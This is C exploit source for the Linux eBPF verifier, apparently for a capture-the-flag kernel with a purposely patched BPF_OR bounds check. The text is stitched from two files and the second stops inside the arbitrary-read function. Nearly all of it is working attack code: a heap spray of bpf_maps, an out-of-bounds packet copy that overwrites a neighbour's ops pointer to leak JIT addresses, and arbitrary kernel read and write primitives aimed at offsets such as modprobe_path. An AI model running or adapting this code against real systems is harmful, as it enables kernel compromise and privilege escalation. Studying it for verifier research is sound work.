      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),      // arg3 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x20),  // arg3 = arg3(fp)-0x20
      // NOTE(review): this spills r6 (map_elem), NOT arg3 — the verifier
      // must track fp-0x18 as a map_value pointer so the later
      // map_update_elem() accepts it; the OOB copy below replaces it with
      // the attacker-supplied `addr`.
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_6,
                  -0x18),  // *(u64*)(fp-0x18) = r6 == map_elem
      // arg4(len)
      BPF_MOV64_REG(BPF_REG_ARG4,
                    BPF_REG_8),  // arg4 = r8 == (actual_val=1; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_MUL, BPF_REG_ARG4,
          0x10 - 1),  // arg4 = 0x0f * arg4 == (actual_val=0x0f; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_ARG4,
          1),  // arg4 = arg4 + 1 == (actual_val=0x10; val=0x1, mask=0)
      // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0x10; val=0x1, mask=0))
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),  // fp-0x18 = addr

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(&key)
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // arg3(&val) — verifier thinks map_value ptr, actually `addr`.
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG3, BPF_REG_FP, -0x18),
      // arg4(flags)
      BPF_MOV64_IMM(BPF_REG_ARG4, 0),
      // map_update_elem(mapfd, &key, &val, 0)
      BPF_EMIT_CALL(BPF_FUNC_map_update_elem),

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)"GPL v2",
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &prog_attr);
  if (progfd < 0) {
    puts("============[failed reason]============");
    printf("%s\n", verifier_log);
    fatal("bpf(BPF_PROG_LOAD)");
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal("socketpair");
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(int))) {
    fatal("setsockopt");
  }

  // Packet layout: [marker][target addr].
  uint64_t buf[] = {0xdeadbeefcafebebe, addr};
  write(socks[1], buf, sizeof(buf));
  bpf_map_lookup(mapfd, 0, &map_val);

  close(socks[0]);
  close(socks[1]);
  close(progfd);

  return map_val;
}

uint64_t bpf_map_addr = 0;

/*
 * Exploit driver: corrupt one sprayed bpf_map's ->ops low byte, find the
 * corrupted map and leak the kernel address of its struct bpf_map, then
 * restore the ops pointer via the arbitrary read/write primitives so the
 * kernel stays stable afterwards.
 *
 * Returns 0 on success, -1 if no corrupted map was found.
 */
int main() {
  srand(time(NULL));
  // (removed unused local `char verifier_log[0x10000]` — each helper keeps
  // its own log buffer.)

  make_corrupted_map();
  find_corrupted_map_and_leak_bpf_map_addr();

  if (corrupted_map_fd == 0) {
    puts("[-] Failed to find corrupted bpf_map");
    return -1;
  }
  printf("[+] mapfd: %d\n", mapfd);
  printf("[+] corrupted_map_fd: %d\n", corrupted_map_fd);
  printf("[+] bpf_map_addr: 0x%016lx\n", bpf_map_addr);

  puts("[*] Restore corrupted map...");
  // aar64() reads the corrupted ops pointer; +8 undoes the -8 that
  // make_corrupted_map() applied to its low byte.
  uint64_t bpf_map_ops = aar64(bpf_map_addr) + 8;
  aaw64(bpf_map_addr, bpf_map_ops);

  return 0;
}

Leak the address of JIT code using an OOB read & heap spray

      // Patch location:
//    https://elixir.bootlin.com/linux/v5.18.14/source/kernel/bpf/verifier.c#L7957
// Diff:
//    7957c7957,7958
//    <               __mark_reg32_known(dst_reg, var32_off.value);
//    ---
//    >               // `scalar_min_max_or` will handle the case
//    >               //__mark_reg32_known(dst_reg, var32_off.value);

#include <asm-generic/socket.h>
#include <fcntl.h>
#include <linux/bpf.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <time.h>
#include <unistd.h>

#include "bpf_insn.h"

// Kernel text base used to turn absolute symbol addresses into offsets
// (assumes the target runs without KASLR — TODO confirm for the challenge VM).
#define KERNEL_BASE 0xffffffff81000000
// Offset of a struct bpf_map_ops table — presumably the array-map ops;
// taken from the target kernel's symbols, verify against the running build.
#define BPF_MAP_OPS_OFFSET (0xffffffff81c124a0 - KERNEL_BASE)
// Index of map_lookup_elem within struct bpf_map_ops (8-byte slots).
#define BPF_MAP_OPS_LOOKUP_IDX 12
#define BPF_MAP_OPS_LOOKUP_ELEM_OFFSET \
  (BPF_MAP_OPS_OFFSET + BPF_MAP_OPS_LOOKUP_IDX * 8)
// Index of map_update_elem within struct bpf_map_ops.
#define BPF_MAP_OPS_UPDATE_ELEM_IDX 13
#define BPF_MAP_OPS_UPDATE_ELEM_OFFSET \
  (BPF_MAP_OPS_OFFSET + BPF_MAP_OPS_UPDATE_ELEM_IDX * 8)
// Address of an ops-like table whose slot returns a useful pointer when
// dispatched as update_elem — presumably found by inspecting the target
// kernel image; verify before use.
#define OPS_CONTAINING_RET_OFFSET (0xffffffff81c15fc8 - KERNEL_BASE)
// Misc. symbol offsets of the target kernel (core_pattern, modprobe_path).
#define CORE_PATTERN_OFFSET (0xffffffff81eb25e0 - KERNEL_BASE)
#define MODBPROB_OFFSET (0xffffffff81e37fe0 - KERNEL_BASE)

/* Show `msg` and block until the user presses enter (consumes one char). */
void get_enter_to_continue(const char* msg) {
  fputs(msg, stdout);
  fputc('\n', stdout);
  (void)getchar();
}

/* Report `msg` plus the current errno description and terminate. */
void fatal(const char* msg) {
  perror(msg);
  exit(-1);
}

/* Minimal bpf(2) syscall wrapper (no libbpf dependency). */
int bpf(int cmd, union bpf_attr* attrs) {
  long rc = syscall(__NR_bpf, cmd, attrs, sizeof *attrs);
  return (int)rc;
}

/*
 * Create a BPF_MAP_TYPE_ARRAY map with 4-byte keys, `val_size`-byte values
 * and `max_entries` slots.  Aborts the process via fatal() on failure;
 * otherwise returns the new map fd.
 */
int bpf_map_create(int val_size, int max_entries) {
  union bpf_attr attr;
  memset(&attr, 0, sizeof(attr));
  attr.map_type = BPF_MAP_TYPE_ARRAY;
  attr.key_size = sizeof(int);
  attr.value_size = val_size;
  attr.max_entries = max_entries;

  int fd = bpf(BPF_MAP_CREATE, &attr);
  if (fd < 0) {
    fatal("bpf(BPF_MAP_CREATE)");
  }
  return fd;
}
/*
 * Write the value at `pval` into element `key` of `map_fd` (BPF_ANY:
 * create or overwrite).  Aborts via fatal() on failure; returns the
 * syscall result otherwise.
 */
int bpf_map_update(int map_fd, int key, void* pval) {
  union bpf_attr attr;
  memset(&attr, 0, sizeof(attr));
  attr.map_fd = map_fd;
  attr.key = (uint64_t)&key;
  attr.value = (uint64_t)pval;
  attr.flags = BPF_ANY;

  int rc = bpf(BPF_MAP_UPDATE_ELEM, &attr);
  if (rc < 0) {
    fatal("bpf(BPF_MAP_UPDATE_ELEM)");
  }
  return rc;
}
/*
 * Read element `key` of `map_fd` into `pval`.  Unlike bpf_map_update(),
 * failure is NOT fatal: the raw syscall result is returned to the caller.
 */
int bpf_map_lookup(int map_fd, int key, void* pval) {
  union bpf_attr attr;
  memset(&attr, 0, sizeof(attr));
  attr.map_fd = map_fd;
  attr.key = (uint64_t)&key;
  attr.value = (uint64_t)pval;
  attr.flags = BPF_ANY;
  return bpf(BPF_MAP_LOOKUP_ELEM, &attr);
}

// fd of the map used as the OOB-write source and userspace<->BPF scratch cell.
int mapfd;
// Sprayed array-map fds; the goal is that one of their struct bpf_map
// allocations lands directly after `mapfd`'s in the kernel heap.
int map_spray_fd[0x100];
// Spray 0x100 small array maps, pick one in the middle as `mapfd`, then
// attach a BPF program whose skb_load_bytes() length is verifier-known-1
// but 0xf2 at runtime.  The OOB copy runs past mapfd's 8-byte value area
// into the neighbouring allocation; packet bytes 0xf0..0xf1 land on the
// low 16 bits of that neighbour's bpf_map->ops pointer, redirecting it to
// a nearby table whose update_elem slot returns a pointer (JIT leak).
void make_corrupted_map() {
  uint64_t map_val = 1;

  puts("[*] Spray struct bpf_map...");
  // Element type is int (4 bytes), so sizeof/4 == 0x100 iterations.
  for (int i = 0; i < sizeof(map_spray_fd) / 4; i++) {
    map_spray_fd[i] = bpf_map_create(sizeof(uint64_t), 1);
    bpf_map_update(map_spray_fd[i], 0, &map_val);
  }
  // Pick a victim in the middle of the spray so a sprayed neighbour is
  // likely to sit right after it in the heap.
  mapfd = map_spray_fd[0x81];

  char verifier_log[0x10000];

  bpf_map_update(mapfd, 0, &map_val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                  -0x08),  // *(u64*)(fp-0x08) = skb

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x10
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // call map_lookup_elem(mapfd, &key(->0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),  // r6 = r0 == map_elem
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0,
                  0),  // r7 = [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),  // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known ->
      // ___mark_reg_known is called.
      // By this calling then r1's min and max will be imm.
      // Because (~0xffffffff00000001) & 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) & 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).
      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),  // r1(w1) = (s32_min=1, s32_max=0,
                                            // u32_min=1, u32_max=0).

      BPF_MOV64_REG(
          BPF_REG_2,
          BPF_REG_7),  // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_ALU64_IMM(BPF_AND, BPF_REG_2,
                    0x1),  // r2 = (val=1, mask=0x1)
      BPF_ALU64_REG(BPF_ADD, BPF_REG_1,
                    BPF_REG_2),  // r1 = r1 + r2 == (actual_val = 2; s32_min=1,
                                 // s32_max=1, u32_min=1, u32_max=1) ==
                                 // (actual_val=2; val=1, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_1,
                    -1),  // r1 = r1 + -1 == (actual_val=1; val=0, mask=0)
      BPF_MOV64_REG(BPF_REG_8,
                    BPF_REG_1),  // r8 = r1 == (actual_val=1; val=0, mask=0)

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0),
      // arg3(to) = map_elem
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_6),  // arg3 = r6 == map_elem
      // arg4(len)
      BPF_MOV64_REG(BPF_REG_ARG4,
                    BPF_REG_8),  // arg4 = r8 == (actual_val=1; val=0, mask=0)
      BPF_ALU64_IMM(BPF_MUL, BPF_REG_ARG4,
                    0xf2 - 1),  // arg4 = (0xf2-1) * arg4 == (actual_val=0xf2-1;
                                // val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_ARG4,
          1),  // arg4 = arg4 + 1 == (actual_val=0xf2; val=0x1, mask=0)
      // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0xf2; val=0x1, mask=0))
      // Runtime length 0xf2 copies the packet over map_elem and the
      // following heap bytes (the neighbour's bpf_map header).
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),  // fp-0x18 = addr

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)"GPL v2",
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &prog_attr);
  if (progfd < 0) {
    puts("============[failed reason]============");
    printf("%s\n", verifier_log);
    fatal("bpf(BPF_PROG_LOAD)");
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal("socketpair");
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(int))) {
    fatal("setsockopt");
  }

  char buf[0x100] = {
      0,
  };
  // Overwrite low byte of bpf_map->ops
  // (https://elixir.bootlin.com/linux/v5.18.14/source/include/linux/bpf.h#L63)
  // The 16-bit replacement aims the victim's ops->map_update_elem slot at
  // OPS_CONTAINING_RET_OFFSET.
  uint16_t ops_containing_ret_offset =
      (OPS_CONTAINING_RET_OFFSET - 8 * BPF_MAP_OPS_UPDATE_ELEM_IDX) & 0xffff;
  printf("ops_containing_ret_offset: 0x%x\n", ops_containing_ret_offset);
  *(uint16_t*)(&buf[0xf0]) = ops_containing_ret_offset;
  write(socks[1], buf, sizeof(buf));

  close(socks[0]);
  close(socks[1]);
  close(progfd);
}

// fd of the sprayed map whose ->ops was corrupted; 0 if none was found.
int corrupted_map_fd;
// Pointer leaked through the corrupted ops slot (expected: a JIT address).
uint64_t jit_addr;
// Scan the sprayed maps for the one with the corrupted ->ops.  Calling
// map_update_elem() on the corrupted map dispatches through the redirected
// ops slot and returns a non-zero value (stored into `jit_addr`).
// NOTE(review): the function name is stale for this variant — it leaks a
// JIT-related pointer, not a bpf_map address.  Candidate fds are also left
// open on every path here.
void find_corrupted_map_and_leak_bpf_map_addr() {
  char verifier_log[0x10000];

  // map_spray_fd holds ints (4 bytes each), so sizeof/4 == entry count.
  for (int i = 0; i < sizeof(map_spray_fd) / 4; ++i) {
    int cur_map_fd = map_spray_fd[i];
    if (cur_map_fd == mapfd) {
      continue;
    }

    // uint64_t map_val = 0;
    // int ret = bpf_map_update(cur_map_fd, 0, &map_val);
    // printf("ret: 0x%x, val: 0x%lx\n", ret, map_val);

    struct bpf_insn insns[] = {
        // BPF_REG_ARG1 == struct __sk_buff
        BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                    -0x08),  // *(u64*)(fp-0x08) = skb

        // arg1(mapfd)
        BPF_LD_MAP_FD(BPF_REG_ARG1, cur_map_fd),
        // arg2(&key) = fp-0x10 <- 0
        BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
        BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
        // arg3(&val) = fp-0x10 <- 0
        BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_ARG2),
        // arg4(flags)
        BPF_MOV64_IMM(BPF_REG_ARG4, 0),
        // map_update_elem(mapfd, fp-0x10, fp-0x10, 0) or map_lookup_elem(mapfd,
        // fp-0x10) if corrupted
        BPF_EMIT_CALL(BPF_FUNC_map_update_elem),
        // Spill r0 (non-zero only for the corrupted map) for exfiltration.
        BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_0, -0x18),

        // arg1(mapfd)
        BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
        // arg2(&key) = fp-0x10 <- 0
        BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
        BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
        // arg3(&val) = fp-0x18 <- return value of map_update_elem or
        // map_lookup_elem.
        BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x18),
        // arg4(flags)
        BPF_MOV64_IMM(BPF_REG_ARG4, 0),
        // map_update_elem(mapfd, fp-0x10, fp-0x18, 0)
        BPF_EMIT_CALL(BPF_FUNC_map_update_elem),

        BPF_MOV64_IMM(BPF_REG_0, 0),
        BPF_EXIT_INSN(),
    };

    union bpf_attr prog_attr = {
        .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
        .insn_cnt = sizeof(insns) / sizeof(insns[0]),
        .insns = (uint64_t)insns,
        .license = (uint64_t)"GPL v2",
        .log_level = 2,
        .log_size = sizeof(verifier_log),
        .log_buf = (uint64_t)verifier_log,
    };

    int progfd = bpf(BPF_PROG_LOAD, &prog_attr);
    if (progfd < 0) {
      puts("============[failed reason]============");
      printf("%s\n", verifier_log);
      fatal("bpf(BPF_PROG_LOAD)");
    }

    int socks[2];
    if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
      fatal("socketpair");
    }
    if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(int))) {
      fatal("setsockopt");
    }

    // Any datagram triggers the attached filter once.
    write(socks[1], "Hello", 5);

    // NOTE(review): `val` stays uninitialized if the lookup fails;
    // consider initializing it to 0.
    uint64_t val;
    bpf_map_lookup(mapfd, 0, &val);

    close(socks[0]);
    close(socks[1]);
    close(progfd);

    if (val != 0) {
      jit_addr = val;
      corrupted_map_fd = cur_map_fd;
      return;
    }
  }
}

// Arbitrary 64-bit kernel write: *(u64*)addr = val.
// The BPF program exploits the patched BPF_OR verifier handling: the
// multiply/add chain yields a skb_load_bytes() length the verifier tracks
// as 1 but that is 0x10 at runtime, so the first copy overruns fp-0x20 and
// replaces the spilled stack pointer at fp-0x18 with the attacker-supplied
// `addr` (packet qword 1).  The second skb_load_bytes() then writes packet
// qword 2 (`val`) through that pointer.
uint64_t aaw64(uint64_t addr, uint64_t val) {
  char verifier_log[0x10000];

  // Seed map value [0] with 1 so the tnum games below behave as annotated.
  uint64_t map_val = 1;
  bpf_map_update(mapfd, 0, &map_val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                  -0x08),  // *(u64*)(fp-0x08) = skb

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x10
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // call map_lookup_elem(mapfd, &key(->0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),  // r6 = r0 == map_elem
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0,
                  0),  // r7 = [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),  // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known ->
      // ___mark_reg_known is called.
      // By this calling then r1's min and max will be imm.
      // Because (~0xffffffff00000001) & 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) & 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).
      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),  // r1(w1) = (s32_min=1, s32_max=0,
                                            // u32_min=1, u32_max=0).

      BPF_MOV64_REG(
          BPF_REG_2,
          BPF_REG_7),  // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_ALU64_IMM(BPF_AND, BPF_REG_2,
                    0x1),  // r2 = (val=1, mask=0x1)
      BPF_ALU64_REG(BPF_ADD, BPF_REG_1,
                    BPF_REG_2),  // r1 = r1 + r2 == (actual_val = 2; s32_min=1,
                                 // s32_max=1, u32_min=1, u32_max=1) ==
                                 // (actual_val=2; val=1, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_1,
                    -1),  // r1 = r1 + -1 == (actual_val=1; val=0, mask=0)
      BPF_MOV64_REG(BPF_REG_8,
                    BPF_REG_1),  // r8 = r1 == (actual_val=1; val=0, mask=0)

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0),
      // arg3(to) = fp-0x20
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),      // arg3 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x20),  // arg3 = arg3(fp)-0x20
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG3,
                  -0x18),  // *(u64*)(fp-0x18) = arg3 == fp-0x20
      // arg4(len)
      BPF_MOV64_REG(BPF_REG_ARG4,
                    BPF_REG_8),  // arg4 = r8 == (actual_val=1; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_MUL, BPF_REG_ARG4,
          0x10 - 1),  // arg4 = 0x0f * arg4 == (actual_val=0x0f; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_ARG4,
          1),  // arg4 = arg4 + 1 == (actual_val=0x10; val=0x1, mask=0)
      // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0x10; val=0x1, mask=0))
      // Runtime length 0x10 overwrites the spilled pointer at fp-0x18 with
      // packet qword 1 (== addr).
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),  // fp-0x18 = addr

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0x10),
      // arg3(to) = addr
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG3, BPF_REG_FP,
                  -0x18),  // arg3 = fp-0x18 == addr
      // arg4(len)
      BPF_MOV64_IMM(BPF_REG_ARG4, 8),
      // skb_load_bytes(skb, 0x10, addr, 8)
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)"GPL v2",
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &prog_attr);
  if (progfd < 0) {
    puts("============[failed reason]============");
    printf("%s\n", verifier_log);
    fatal("bpf(BPF_PROG_LOAD)");
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal("socketpair");
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(int))) {
    fatal("setsockopt");
  }

  // Packet layout consumed by the program: [marker][target addr][value].
  uint64_t buf[] = {0xdeadbeefcafebebe, addr, val};
  write(socks[1], buf, sizeof(buf));

  close(socks[0]);
  close(socks[1]);
  close(progfd);

  // buf[] is never modified; the marker qword is returned as a convenience.
  return buf[0];
}
// Arbitrary 64-bit kernel read: returns *(u64*)addr.
// Same verifier/runtime length mismatch as aaw64(); here the verifier is
// made to believe fp-0x18 holds a map_value pointer (r6 is spilled there),
// the OOB copy replaces it with `addr`, and map_update_elem() then copies
// 8 bytes from `addr` into `mapfd`'s value slot for userspace to read.
uint64_t aar64(uint64_t addr) {
  char verifier_log[0x10000];

  uint64_t map_val = 1;
  bpf_map_update(mapfd, 0, &map_val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                  -0x08),  // *(u64*)(fp-0x08) = skb

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x10
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // call map_lookup_elem(mapfd, &key(->0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),  // r6 = r0 == map_elem
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0,
                  0),  // r7 = [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),  // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known ->
      // ___mark_reg_known is called.
      // By this calling then r1's min and max will be imm.
      // Because (~0xffffffff00000001) & 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) & 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).
      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),  // r1(w1) = (s32_min=1, s32_max=0,
                                            // u32_min=1, u32_max=0).

      BPF_MOV64_REG(
          BPF_REG_2,
          BPF_REG_7),  // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_ALU64_IMM(BPF_AND, BPF_REG_2,
                    0x1),  // r2 = (val=1, mask=0x1)
      BPF_ALU64_REG(BPF_ADD, BPF_REG_1,
                    BPF_REG_2),  // r1 = r1 + r2 == (actual_val = 2; s32_min=1,
                                 // s32_max=1, u32_min=1, u32_max=1) ==
                                 // (actual_val=2; val=1, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_1,
                    -1),  // r1 = r1 + -1 == (actual_val=1; val=0, mask=0)
      BPF_MOV64_REG(BPF_REG_8,
                    BPF_REG_1),  // r8 = r1 == (actual_val=1; val=0, mask=0)

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0),
      // arg3(to) = fp-0x20
